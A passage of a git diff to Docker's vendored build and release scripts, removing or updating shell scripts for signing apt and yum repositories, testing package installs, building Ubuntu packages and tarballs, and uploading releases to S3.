$YUMDIR ]; then - echo >&2 'release-rpm or release-deb must be run before sign-repos' - exit 1 -fi - -sign_packages(){ - # sign apt repo metadata - if [ -d $APTDIR ]; then - # create file with public key - gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/apt/gpg" - - # sign the repo metadata - for F in $(find $APTDIR -name Release); do - if test "$F" -nt "$F.gpg" ; then - gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ - --digest-algo "sha512" \ - --armor --sign --detach-sign \ - --batch --yes \ - --output "$F.gpg" "$F" - fi - inRelease="$(dirname "$F")/InRelease" - if test "$F" -nt "$inRelease" ; then - gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ - --digest-algo "sha512" \ - --clearsign \ - --batch --yes \ - --output "$inRelease" "$F" - fi - done - fi - - # sign yum repo metadata - if [ -d $YUMDIR ]; then - # create file with public key - gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/yum/gpg" - - # sign the repo metadata - for F in $(find $YUMDIR -name repomd.xml); do - if test "$F" -nt "$F.asc" ; then - gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ - --digest-algo "sha512" \ - --armor --sign --detach-sign \ - --batch --yes \ - --output "$F.asc" "$F" - fi - done - fi -} - -sign_packages diff --git a/vendor/github.com/docker/docker/hack/make/test-deb-install b/vendor/github.com/docker/docker/hack/make/test-deb-install deleted file mode 100755 index aec5847600..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-deb-install +++ /dev/null @@ -1,71 +0,0 @@ -#!/bin/bash -# This script is used for testing install.sh and that it works for -# each of component of our apt and yum repos -set -e - -: ${DEB_DIR:="$(pwd)/bundles/$(cat VERSION)/build-deb"} - -if [[ ! -d "${DEB_DIR}" ]]; then - echo "you must first run `make deb` or hack/make/build-deb" - exit 1 -fi - -test_deb_install(){ - # test for each Dockerfile in contrib/builder - - builderDir="contrib/builder/deb/${PACKAGE_ARCH}" - pkgs=( $(find "${builderDir}/"*/ -type d) ) - if [ ! -z "$DOCKER_BUILD_PKGS" ]; then - pkgs=() - for p in $DOCKER_BUILD_PKGS; do - pkgs+=( "$builderDir/$p" ) - done - fi - for dir in "${pkgs[@]}"; do - [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } - local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" - local dir=$(basename "$dir") - - if [[ ! -d "${DEB_DIR}/${dir}" ]]; then - echo "No deb found for ${dir}" - exit 1 - fi - - local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) - cat <<-EOF > "${script}" - #!/bin/bash - set -e - set -x - - apt-get update && apt-get install -y apparmor - - dpkg -i /root/debs/*.deb || true - - apt-get install -yf - - /etc/init.d/apparmor start - - # this will do everything _except_ load the profile into the kernel - ( - cd /etc/apparmor.d - /sbin/apparmor_parser --skip-kernel-load docker-engine - ) - EOF - - chmod +x "${script}" - - echo "testing deb install for ${from}" - docker run --rm -i --privileged \ - -v ${DEB_DIR}/${dir}:/root/debs \ - -v ${script}:/install.sh \ - ${from} /install.sh - - rm -f ${script} - done -} - -( - bundle .integration-daemon-start - test_deb_install - bundle .integration-daemon-stop -) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-docker-py b/vendor/github.com/docker/docker/hack/make/test-docker-py index fcacc16436..b30879e3a0 100644 --- a/vendor/github.com/docker/docker/hack/make/test-docker-py +++ b/vendor/github.com/docker/docker/hack/make/test-docker-py @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e source hack/make/.integration-test-helpers diff --git a/vendor/github.com/docker/docker/hack/make/test-install-script b/vendor/github.com/docker/docker/hack/make/test-install-script deleted file mode 100755 index 4782cbea88..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-install-script +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash -# This script is used for testing install.sh and that it works for -# each of component of our apt and yum repos -set -e - -test_install_script(){ - # these are equivalent to main, testing, experimental components - # in the repos, but its the url that will do the conversion - components=( experimental test get ) - - for component in "${components[@]}"; do - # change url to specific component for testing - local test_url=https://${component}.docker.com - local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) - sed "s,url='https://get.docker.com/',url='${test_url}/'," hack/install.sh > "${script}" - - chmod +x "${script}" - - # test for each Dockerfile in contrib/builder - for dir in contrib/builder/*/*/; do - local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" - - echo "running install.sh for ${component} with ${from}" - docker run --rm -i -v ${script}:/install.sh ${from} /install.sh - done - - rm -f ${script} - done -} - -test_install_script diff --git a/vendor/github.com/docker/docker/hack/make/test-integration b/vendor/github.com/docker/docker/hack/make/test-integration new file mode 100755 index 0000000000..c807cd4978 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-integration @@ -0,0 +1,21 @@ +#!/usr/bin/env bash +set -e -o pipefail + +source hack/make/.integration-test-helpers + +( + build_test_suite_binaries + bundle .integration-daemon-start + bundle .integration-daemon-setup + + local testexit=0 + ( repeat run_test_integration ) || testexit=$? + + # Always run cleanup, even if the subshell fails + bundle .integration-daemon-stop + cleanup_test_suite_binaries + error_on_leaked_containerd_shims + + exit $testexit + +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-cli b/vendor/github.com/docker/docker/hack/make/test-integration-cli index 689a5285f3..480851e70f 100755 --- a/vendor/github.com/docker/docker/hack/make/test-integration-cli +++ b/vendor/github.com/docker/docker/hack/make/test-integration-cli @@ -1,28 +1,6 @@ -#!/bin/bash +#!/usr/bin/env bash set -e +echo "WARNING: test-integration-cli is DEPRECATED. Use test-integration." >&2 -source hack/make/.integration-test-helpers - -# subshell so that we can export PATH without breaking other things -( - bundle .integration-daemon-start - - bundle .integration-daemon-setup - - bundle_test_integration_cli - - bundle .integration-daemon-stop - - if [ "$(go env GOOS)" != 'windows' ] - then - leftovers=$(ps -ax -o pid,cmd | awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration-cli/ { print $1 }') - if [ -n "$leftovers" ] - then - ps aux - kill -9 $leftovers 2> /dev/null - echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!" - exit 1 - fi - fi - -) 2>&1 | tee -a "$DEST/test.log" +# TODO: remove this and exit 1 once CI has changed to use test-integration +bundle test-integration diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-shell b/vendor/github.com/docker/docker/hack/make/test-integration-shell index 86df9654a3..bcfa4682eb 100644 --- a/vendor/github.com/docker/docker/hack/make/test-integration-shell +++ b/vendor/github.com/docker/docker/hack/make/test-integration-shell @@ -1,7 +1,9 @@ -#!/bin/bash +#!/usr/bin/env bash bundle .integration-daemon-start bundle .integration-daemon-setup export ABS_DEST bash +e + +bundle .integration-daemon-stop diff --git a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo deleted file mode 100755 index bb20128e30..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo +++ /dev/null @@ -1,29 +0,0 @@ -#!/bin/bash -set -e - -versions=( 1.3.3 1.4.1 1.5.0 1.6.2 ) - -install() { - local version=$1 - local tmpdir=$(mktemp -d /tmp/XXXXXXXXXX) - local dockerfile="${tmpdir}/Dockerfile" - cat <<-EOF > "$dockerfile" - FROM debian:jessie - ENV VERSION ${version} - RUN apt-get update && apt-get install -y \ - apt-transport-https \ - ca-certificates \ - --no-install-recommends - RUN echo "deb https://get.docker.com/ubuntu docker main" > /etc/apt/sources.list.d/docker.list - RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 \ - --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9 - RUN apt-get update && apt-get install -y \ - lxc-docker-\${VERSION} - EOF - - docker build --rm --force-rm --no-cache -t docker-old-repo:${version} -f $dockerfile $tmpdir -} - -for v in "${versions[@]}"; do - install "$v" -done diff --git a/vendor/github.com/docker/docker/hack/make/test-unit b/vendor/github.com/docker/docker/hack/make/test-unit deleted file mode 100644 index f263345ce6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/test-unit +++ /dev/null @@ -1,55 +0,0 @@ -#!/bin/bash -set -e - -# Run Docker's test suite, including sub-packages, and store their output as a bundle -# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. -# You can use this to select certain tests to run, e.g. -# -# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit -# -bundle_test_unit() { - TESTFLAGS+=" -test.timeout=${TIMEOUT}" - INCBUILD="-i" - count=0 - for flag in "${BUILDFLAGS[@]}"; do - if [ "${flag}" == ${INCBUILD} ]; then - unset BUILDFLAGS[${count}] - break - fi - count=$[ ${count} + 1 ] - done - - date - if [ -z "$TESTDIRS" ]; then - TEST_PATH=./... - else - TEST_PATH=./${TESTDIRS} - fi - - if [ "$(go env GOHOSTOS)" = 'solaris' ]; then - pkg_list=$(go list -e \ - -f '{{if ne .Name "github.com/docker/docker"}} - {{.ImportPath}} - {{end}}' \ - "${BUILDFLAGS[@]}" $TEST_PATH \ - | grep github.com/docker/docker \ - | grep -v github.com/docker/docker/vendor \ - | grep -v github.com/docker/docker/daemon/graphdriver \ - | grep -v github.com/docker/docker/man \ - | grep -v github.com/docker/docker/integration-cli) - else - pkg_list=$(go list -e \ - -f '{{if ne .Name "github.com/docker/docker"}} - {{.ImportPath}} - {{end}}' \ - "${BUILDFLAGS[@]}" $TEST_PATH \ - | grep github.com/docker/docker \ - | grep -v github.com/docker/docker/vendor \ - | grep -v github.com/docker/docker/man \ - | grep -v github.com/docker/docker/integration-cli) - fi - - go test -cover -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" $TESTFLAGS $pkg_list -} - -bundle_test_unit 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/tgz b/vendor/github.com/docker/docker/hack/make/tgz deleted file mode 100644 index 3ccd93fa01..0000000000 --- a/vendor/github.com/docker/docker/hack/make/tgz +++ /dev/null @@ -1,92 +0,0 @@ -#!/bin/bash - -CROSS="$DEST/../cross" - -set -e - -arch=$(go env GOHOSTARCH) -if [ ! -d "$CROSS/linux/${arch}" ]; then - echo >&2 'error: binary and cross must be run before tgz' - false -fi - -( -for d in "$CROSS/"*/*; do - export GOARCH="$(basename "$d")" - export GOOS="$(basename "$(dirname "$d")")" - - source "${MAKEDIR}/.binary-setup" - - BINARY_NAME="${DOCKER_CLIENT_BINARY_NAME}-$VERSION" - DAEMON_BINARY_NAME="${DOCKER_DAEMON_BINARY_NAME}-$VERSION" - PROXY_BINARY_NAME="${DOCKER_PROXY_BINARY_NAME}-$VERSION" - BINARY_EXTENSION="$(export GOOS && binary_extension)" - if [ "$GOOS" = 'windows' ]; then - # if windows use a zip, not tgz - BUNDLE_EXTENSION=".zip" - IS_TAR="false" - elif [ "$GOOS" == "solaris" ]; then - # Solaris bypasses cross due to CGO issues. - continue - else - BUNDLE_EXTENSION=".tgz" - IS_TAR="true" - fi - BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" - DAEMON_BINARY_FULLNAME="$DAEMON_BINARY_NAME$BINARY_EXTENSION" - PROXY_BINARY_FULLNAME="$PROXY_BINARY_NAME$BINARY_EXTENSION" - mkdir -p "$DEST/$GOOS/$GOARCH" - TGZ="$DEST/$GOOS/$GOARCH/$BINARY_NAME$BUNDLE_EXTENSION" - - # The staging directory for the files in the tgz - BUILD_PATH="$DEST/build" - - # The directory that is at the root of the tar file - TAR_BASE_DIRECTORY="docker" - - # $DEST/build/docker - TAR_PATH="$BUILD_PATH/$TAR_BASE_DIRECTORY" - - # Copy the correct docker binary - mkdir -p $TAR_PATH - cp -L "$d/$BINARY_FULLNAME" "$TAR_PATH/${DOCKER_CLIENT_BINARY_NAME}${BINARY_EXTENSION}" - if [ -f "$d/$DAEMON_BINARY_FULLNAME" ]; then - cp -L "$d/$DAEMON_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_DAEMON_BINARY_NAME}${BINARY_EXTENSION}" - fi - if [ -f "$d/$PROXY_BINARY_FULLNAME" ]; then - cp -L "$d/$PROXY_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_PROXY_BINARY_NAME}${BINARY_EXTENSION}" - fi - - # copy over all the extra binaries - copy_binaries $TAR_PATH - - # add completions - for s in bash fish zsh; do - mkdir -p $TAR_PATH/completion/$s - cp -L contrib/completion/$s/*docker* $TAR_PATH/completion/$s/ - done - - if [ "$IS_TAR" == "true" ]; then - echo "Creating tgz from $BUILD_PATH and naming it $TGZ" - tar --numeric-owner --owner 0 -C "$BUILD_PATH" -czf "$TGZ" $TAR_BASE_DIRECTORY - else - # ZIP needs to full absolute dir path, not the absolute path - ZIP=`pwd`"/$TGZ" - # keep track of where we are, for later. - pushd . - # go into the BUILD_PATH since zip does not have a -C equivalent. - cd $BUILD_PATH - echo "Creating zip from $BUILD_PATH and naming it $ZIP" - zip -q -r $ZIP $TAR_BASE_DIRECTORY - # go back to where we started - popd - fi - - hash_files "$TGZ" - - # cleanup after ourselves - rm -rf "$BUILD_PATH" - - echo "Created tgz: $TGZ" -done -) diff --git a/vendor/github.com/docker/docker/hack/make/ubuntu b/vendor/github.com/docker/docker/hack/make/ubuntu deleted file mode 100644 index 8de5d9ceac..0000000000 --- a/vendor/github.com/docker/docker/hack/make/ubuntu +++ /dev/null @@ -1,190 +0,0 @@ -#!/bin/bash - -PKGVERSION="${VERSION//-/'~'}" -# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better -if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - GIT_UNIX="$(git log -1 --pretty='%at')" - GIT_DATE="$(date --date "@$GIT_UNIX" +'%Y%m%d.%H%M%S')" - GIT_COMMIT="$(git log -1 --pretty='%h')" - GIT_VERSION="git${GIT_DATE}.0.${GIT_COMMIT}" - # GIT_VERSION is now something like 'git20150128.112847.0.17e840a' - PKGVERSION="$PKGVERSION~$GIT_VERSION" -fi - -# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false -# true -# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false -# true -# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false -# true - -# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a - -PACKAGE_ARCHITECTURE="$(dpkg-architecture -qDEB_HOST_ARCH)" -PACKAGE_URL="https://www.docker.com/" -PACKAGE_MAINTAINER="support@docker.com" -PACKAGE_DESCRIPTION="Linux container runtime -Docker complements LXC with a high-level API which operates at the process -level. It runs unix processes with strong guarantees of isolation and -repeatability across servers. -Docker is a great building block for automating distributed systems: -large-scale web deployments, database clusters, continuous deployment systems, -private PaaS, service-oriented architectures, etc." -PACKAGE_LICENSE="Apache-2.0" - -# Build docker as an ubuntu package using FPM and REPREPRO (sue me). -# bundle_binary must be called first. -bundle_ubuntu() { - DIR="$ABS_DEST/build" - - # Include our udev rules - mkdir -p "$DIR/etc/udev/rules.d" - cp contrib/udev/80-docker.rules "$DIR/etc/udev/rules.d/" - - # Include our init scripts - mkdir -p "$DIR/etc/init" - cp contrib/init/upstart/docker.conf "$DIR/etc/init/" - mkdir -p "$DIR/etc/init.d" - cp contrib/init/sysvinit-debian/docker "$DIR/etc/init.d/" - mkdir -p "$DIR/etc/default" - cp contrib/init/sysvinit-debian/docker.default "$DIR/etc/default/docker" - mkdir -p "$DIR/lib/systemd/system" - cp contrib/init/systemd/docker.{service,socket} "$DIR/lib/systemd/system/" - - # Include contributed completions - mkdir -p "$DIR/etc/bash_completion.d" - cp contrib/completion/bash/docker "$DIR/etc/bash_completion.d/" - mkdir -p "$DIR/usr/share/zsh/vendor-completions" - cp contrib/completion/zsh/_docker "$DIR/usr/share/zsh/vendor-completions/" - mkdir -p "$DIR/etc/fish/completions" - cp contrib/completion/fish/docker.fish "$DIR/etc/fish/completions/" - - # Include man pages - make manpages - manRoot="$DIR/usr/share/man" - mkdir -p "$manRoot" - for manDir in man/man?; do - manBase="$(basename "$manDir")" # "man1" - for manFile in "$manDir"/*; do - manName="$(basename "$manFile")" # "docker-build.1" - mkdir -p "$manRoot/$manBase" - gzip -c "$manFile" > "$manRoot/$manBase/$manName.gz" - done - done - - # Copy the binary - # This will fail if the binary bundle hasn't been built - mkdir -p "$DIR/usr/bin" - cp "$DEST/../binary/docker-$VERSION" "$DIR/usr/bin/docker" - - # Generate postinst/prerm/postrm scripts - cat > "$DEST/postinst" <<'EOF' -#!/bin/sh -set -e -set -u - -if [ "$1" = 'configure' ] && [ -z "$2" ]; then - if ! getent group docker > /dev/null; then - groupadd --system docker - fi -fi - -if ! { [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; }; then - # we only need to do this if upstart isn't in charge - update-rc.d docker defaults > /dev/null || true -fi -if [ -n "$2" ]; then - _dh_action=restart -else - _dh_action=start -fi -service docker $_dh_action 2>/dev/null || true - -#DEBHELPER# -EOF - cat > "$DEST/prerm" <<'EOF' -#!/bin/sh -set -e -set -u - -service docker stop 2>/dev/null || true - -#DEBHELPER# -EOF - cat > "$DEST/postrm" <<'EOF' -#!/bin/sh -set -e -set -u - -if [ "$1" = "purge" ] ; then - update-rc.d docker remove > /dev/null || true -fi - -# In case this system is running systemd, we make systemd reload the unit files -# to pick up changes. -if [ -d /run/systemd/system ] ; then - systemctl --system daemon-reload > /dev/null || true -fi - -#DEBHELPER# -EOF - # TODO swaths of these were borrowed from debhelper's auto-inserted stuff, because we're still using fpm - we need to use debhelper instead, and somehow reconcile Ubuntu that way - chmod +x "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" - - ( - # switch directories so we create *.deb in the right folder - cd "$DEST" - - # create lxc-docker-VERSION package - fpm -s dir -C "$DIR" \ - --name "lxc-docker-$VERSION" --version "$PKGVERSION" \ - --after-install "$ABS_DEST/postinst" \ - --before-remove "$ABS_DEST/prerm" \ - --after-remove "$ABS_DEST/postrm" \ - --architecture "$PACKAGE_ARCHITECTURE" \ - --prefix / \ - --depends iptables \ - --deb-recommends aufs-tools \ - --deb-recommends ca-certificates \ - --deb-recommends git \ - --deb-recommends xz-utils \ - --deb-recommends 'cgroupfs-mount | cgroup-lite' \ - --deb-suggests apparmor \ - --description "$PACKAGE_DESCRIPTION" \ - --maintainer "$PACKAGE_MAINTAINER" \ - --conflicts docker \ - --conflicts docker.io \ - --conflicts lxc-docker-virtual-package \ - --provides lxc-docker \ - --provides lxc-docker-virtual-package \ - --replaces lxc-docker \ - --replaces lxc-docker-virtual-package \ - --url "$PACKAGE_URL" \ - --license "$PACKAGE_LICENSE" \ - --config-files /etc/udev/rules.d/80-docker.rules \ - --config-files /etc/init/docker.conf \ - --config-files /etc/init.d/docker \ - --config-files /etc/default/docker \ - --deb-compression gz \ - -t deb . - # TODO replace "Suggests: cgroup-lite" with "Recommends: cgroupfs-mount | cgroup-lite" once cgroupfs-mount is available - - # create empty lxc-docker wrapper package - fpm -s empty \ - --name lxc-docker --version "$PKGVERSION" \ - --architecture "$PACKAGE_ARCHITECTURE" \ - --depends lxc-docker-$VERSION \ - --description "$PACKAGE_DESCRIPTION" \ - --maintainer "$PACKAGE_MAINTAINER" \ - --url "$PACKAGE_URL" \ - --license "$PACKAGE_LICENSE" \ - --deb-compression gz \ - -t deb - ) - - # clean up after ourselves so we have a clean output directory - rm "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" - rm -r "$DIR" -} - -bundle_ubuntu diff --git a/vendor/github.com/docker/docker/hack/make/update-apt-repo b/vendor/github.com/docker/docker/hack/make/update-apt-repo deleted file mode 100755 index 7354a2ecff..0000000000 --- a/vendor/github.com/docker/docker/hack/make/update-apt-repo +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/bash -set -e - -# This script updates the apt repo in $DOCKER_RELEASE_DIR/apt/repo. -# This script is a "fix all" for any sort of problems that might have occurred with -# the Release or Package files in the repo. -# It should only be used in the rare case of extreme emergencies to regenerate -# Release and Package files for the apt repo. -# -# NOTE: Always be sure to re-sign the repo with hack/make/sign-repos after running -# this script. - -: ${DOCKER_RELEASE_DIR:=$DEST} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo - -# supported arches/sections -arches=( amd64 i386 ) - -# Preserve existing components but don't add any non-existing ones -for component in main testing experimental ; do - if ls "$APTDIR/dists/*/$component" >/dev/null 2>&1 ; then - components+=( $component ) - fi -done - -dists=( $(find "${APTDIR}/dists" -maxdepth 1 -mindepth 1 -type d) ) - -# override component if it is set -if [ "$COMPONENT" ]; then - components=( $COMPONENT ) -fi - -# release the debs -for version in "${dists[@]}"; do - for component in "${components[@]}"; do - codename="${version//debootstrap-}" - - # update the filelist for this codename/component - find "$APTDIR/pool/$component" \ - -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" - done -done - -# run the apt-ftparchive commands so we can have pinning -apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" - -for dist in "${dists[@]}"; do - version=$(basename "$dist") - for component in "${components[@]}"; do - codename="${version//debootstrap-}" - - apt-ftparchive \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - release \ - "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" - - for arch in "${arches[@]}"; do - apt-ftparchive \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - -o "APT::FTPArchive::Release::Component=$component" \ - -o "APT::FTPArchive::Release::Architecture=$arch" \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - release \ - "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" - done - done -done diff --git a/vendor/github.com/docker/docker/hack/make/win b/vendor/github.com/docker/docker/hack/make/win deleted file mode 100644 index f9f4111276..0000000000 --- a/vendor/github.com/docker/docker/hack/make/win +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -e - -# explicit list of os/arch combos that support being a daemon -declare -A daemonSupporting -daemonSupporting=( - [linux/amd64]=1 - [windows/amd64]=1 -) -platform="windows/amd64" -export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION -mkdir -p "$DEST" -ABS_DEST="$(cd "$DEST" && pwd -P)" -export GOOS=${platform%/*} -export GOARCH=${platform##*/} -if [ -z "${daemonSupporting[$platform]}" ]; then - export LDFLAGS_STATIC_DOCKER="" # we just need a simple client for these platforms - export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) # remove the "daemon" build tag from platforms that aren't supported -fi -source "${MAKEDIR}/binary" diff --git a/vendor/github.com/docker/docker/hack/release.sh b/vendor/github.com/docker/docker/hack/release.sh deleted file mode 100755 index 4b020537ea..0000000000 --- a/vendor/github.com/docker/docker/hack/release.sh +++ /dev/null @@ -1,325 +0,0 @@ -#!/usr/bin/env bash -set -e - -# This script looks for bundles built by make.sh, and releases them on a -# public S3 bucket. -# -# Bundles should be available for the VERSION string passed as argument. -# -# The correct way to call this script is inside a container built by the -# official Dockerfile at the root of the Docker source code. The Dockerfile, -# make.sh and release.sh should all be from the same source code revision. - -set -o pipefail - -# Print a usage message and exit. -usage() { - cat >&2 <<'EOF' -To run, I need: -- to be in a container generated by the Dockerfile at the top of the Docker - repository; -- to be provided with the location of an S3 bucket and path, in - environment variables AWS_S3_BUCKET and AWS_S3_BUCKET_PATH (default: ''); -- to be provided with AWS credentials for this S3 bucket, in environment - variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY; -- a generous amount of good will and nice manners. -The canonical way to run me is to run the image produced by the Dockerfile: e.g.:" - -docker run -e AWS_S3_BUCKET=test.docker.com \ - -e AWS_ACCESS_KEY_ID \ - -e AWS_SECRET_ACCESS_KEY \ - -e AWS_DEFAULT_REGION \ - -it --privileged \ - docker ./hack/release.sh -EOF - exit 1 -} - -[ "$AWS_S3_BUCKET" ] || usage -[ "$AWS_ACCESS_KEY_ID" ] || usage -[ "$AWS_SECRET_ACCESS_KEY" ] || usage -[ -d /go/src/github.com/docker/docker ] || usage -cd /go/src/github.com/docker/docker -[ -x hack/make.sh ] || usage - -export AWS_DEFAULT_REGION -: ${AWS_DEFAULT_REGION:=us-west-1} - -AWS_CLI=${AWS_CLI:-'aws'} - -RELEASE_BUNDLES=( - binary - cross - tgz -) - -if [ "$1" != '--release-regardless-of-test-failure' ]; then - RELEASE_BUNDLES=( - test-unit - "${RELEASE_BUNDLES[@]}" - test-integration-cli - ) -fi - -VERSION=$(< VERSION) -BUCKET=$AWS_S3_BUCKET -BUCKET_PATH=$BUCKET -[[ -n "$AWS_S3_BUCKET_PATH" ]] && BUCKET_PATH+=/$AWS_S3_BUCKET_PATH - -if command -v git &> /dev/null && git rev-parse &> /dev/null; then - if [ -n "$(git status --porcelain --untracked-files=no)" ]; then - echo "You cannot run the release script on a repo with uncommitted changes" - usage - fi -fi - -# These are the 2 keys we've used to sign the deb's -# release (get.docker.com) -# GPG_KEY="36A1D7869245C8950F966E92D8576A8BA88D21E9" -# test (test.docker.com) -# GPG_KEY="740B314AE3941731B942C66ADF4FD13717AAD7D6" - -setup_s3() { - echo "Setting up S3" - # Try creating the bucket. Ignore errors (it might already exist). - $AWS_CLI s3 mb "s3://$BUCKET" 2>/dev/null || true - # Check access to the bucket. - $AWS_CLI s3 ls "s3://$BUCKET" >/dev/null - # Make the bucket accessible through website endpoints. - $AWS_CLI s3 website --index-document index --error-document error "s3://$BUCKET" -} - -# write_to_s3 uploads the contents of standard input to the specified S3 url. -write_to_s3() { - DEST=$1 - F=`mktemp` - cat > "$F" - $AWS_CLI s3 cp --acl public-read --content-type 'text/plain' "$F" "$DEST" - rm -f "$F" -} - -s3_url() { - case "$BUCKET" in - get.docker.com|test.docker.com|experimental.docker.com) - echo "https://$BUCKET_PATH" - ;; - *) - BASE_URL="http://${BUCKET}.s3-website-${AWS_DEFAULT_REGION}.amazonaws.com" - if [[ -n "$AWS_S3_BUCKET_PATH" ]] ; then - echo "$BASE_URL/$AWS_S3_BUCKET_PATH" - else - echo "$BASE_URL" - fi - ;; - esac -} - -build_all() { - echo "Building release" - if ! ./hack/make.sh "${RELEASE_BUNDLES[@]}"; then - echo >&2 - echo >&2 'The build or tests appear to have failed.' - echo >&2 - echo >&2 'You, as the release maintainer, now have a couple options:' - echo >&2 '- delay release and fix issues' - echo >&2 '- delay release and fix issues' - echo >&2 '- did we mention how important this is? issues need fixing :)' - echo >&2 - echo >&2 'As a final LAST RESORT, you (because only you, the release maintainer,' - echo >&2 ' really knows all the hairy problems at hand with the current release' - echo >&2 ' issues) may bypass this checking by running this script again with the' - echo >&2 ' single argument of "--release-regardless-of-test-failure", which will skip' - echo >&2 ' running the test suite, and will only build the binaries and packages. Please' - echo >&2 ' avoid using this if at all possible.' - echo >&2 - echo >&2 'Regardless, we cannot stress enough the scarcity with which this bypass' - echo >&2 ' should be used. If there are release issues, we should always err on the' - echo >&2 ' side of caution.' - echo >&2 - exit 1 - fi -} - -upload_release_build() { - src="$1" - dst="$2" - latest="$3" - - echo - echo "Uploading $src" - echo " to $dst" - echo - $AWS_CLI s3 cp --follow-symlinks --acl public-read "$src" "$dst" - if [ "$latest" ]; then - echo - echo "Copying to $latest" - echo - $AWS_CLI s3 cp --acl public-read "$dst" "$latest" - fi - - # get hash files too (see hash_files() in hack/make.sh) - for hashAlgo in md5 sha256; do - if [ -e "$src.$hashAlgo" ]; then - echo - echo "Uploading $src.$hashAlgo" - echo " to $dst.$hashAlgo" - echo - $AWS_CLI s3 cp --follow-symlinks --acl public-read --content-type='text/plain' "$src.$hashAlgo" "$dst.$hashAlgo" - if [ "$latest" ]; then - echo - echo "Copying to $latest.$hashAlgo" - echo - $AWS_CLI s3 cp --acl public-read "$dst.$hashAlgo" "$latest.$hashAlgo" - fi - fi - done -} - -release_build() { - echo "Releasing binaries" - GOOS=$1 - GOARCH=$2 - - binDir=bundles/$VERSION/cross/$GOOS/$GOARCH - tgzDir=bundles/$VERSION/tgz/$GOOS/$GOARCH - binary=docker-$VERSION - zipExt=".tgz" - binaryExt="" - tgz=$binary$zipExt - - latestBase= - if [ -z "$NOLATEST" ]; then - latestBase=docker-latest - fi - - # we need to map our GOOS and GOARCH to uname values - # see https://en.wikipedia.org/wiki/Uname - # ie, GOOS=linux -> "uname -s"=Linux - - s3Os=$GOOS - case "$s3Os" in - darwin) - s3Os=Darwin - ;; - freebsd) - s3Os=FreeBSD - ;; - linux) - s3Os=Linux - ;; - solaris) - echo skipping solaris release - return 0 - ;; - windows) - # this is windows use the .zip and .exe extensions for the files. - s3Os=Windows - zipExt=".zip" - binaryExt=".exe" - tgz=$binary$zipExt - binary+=$binaryExt - ;; - *) - echo >&2 "error: can't convert $s3Os to an appropriate value for 'uname -s'" - exit 1 - ;; - esac - - s3Arch=$GOARCH - case "$s3Arch" in - amd64) - s3Arch=x86_64 - ;; - 386) - s3Arch=i386 - ;; - arm) - s3Arch=armel - # someday, we might potentially support multiple GOARM values, in which case we might get armhf here too - ;; - *) - echo >&2 "error: can't convert $s3Arch to an appropriate value for 'uname -m'" - exit 1 - ;; - esac - - s3Dir="s3://$BUCKET_PATH/builds/$s3Os/$s3Arch" - # latest= - latestTgz= - if [ "$latestBase" ]; then - # commented out since we aren't uploading binaries right now. - # 